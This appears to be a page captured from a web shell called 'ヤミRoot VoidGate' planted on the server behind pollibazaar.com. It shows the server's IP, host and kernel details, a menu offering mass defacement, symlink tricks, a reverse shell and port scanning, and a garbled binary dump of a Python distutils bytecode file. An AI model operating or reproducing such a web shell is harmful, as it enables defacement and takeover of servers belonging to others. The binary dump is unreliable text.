ヤミRoot VoidGate
User / IP
:
216.73.217.13
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
opt
/
alt
/
python311
/
lib64
/
python3.11
/
distutils
/
command
/
__pycache__
/
Viewing: bdist.cpython-311.pyc
� J�!�U�W� �T � d Z ddlZddlmZ ddlT ddlmZ d� Z G d� de� � ZdS ) zidistutils.command.bdist Implements the Distutils 'bdist' command (create a built [binary] distribution).� N)�Command)�*)�get_platformc �� � ddl m} g }t j D ]3}|� d|z dt j | d f� � �4 | |� � }|� d� � dS )zFPrint list of available formats (arguments to "--format" option). r )�FancyGetopt�formats=N� z'List of available distribution formats:)�distutils.fancy_getoptr �bdist�format_commands�append�format_command� print_help)r �formats�format�pretty_printers �>/opt/alt/python311/lib64/python3.11/distutils/command/bdist.py�show_formatsr s� � � 3�2�2�2�2�2��G��'� :� :����� �V�+�T��,�V�4�Q�7�9� :� :� :� :� �[��)�)�N����G�H�H�H�H�H� c � � e Zd ZdZdddd e� � z fdddd d gZdgZdd defgZdZ ddd�Z g d�Zdddddddd�Zd� Z d� Zd� Zd S )r z$create a built (binary) distribution)zbdist-base=�bz4temporary directory for creating built distributionsz plat-name=�pz;platform name to embed in generated filenames (default: %s))r Nz/formats for distribution (comma-separated list))z dist-dir=�dz=directory to put final built distributions in [default: dist])� skip-buildNz2skip rebuilding everything (for testing/debugging))zowner=�uz@Owner name used when creating a tar file [default: current user])zgroup=�gzAGroup name used when creating a tar file [default: current group]r zhelp-formatsNz$lists available distribution formats)� bdist_rpm�gztar�zip)�posix�nt)�rpmr �bztar�xztar�ztar�tarr )r zRPM distribution)� bdist_dumbzgzip'ed tar file)r'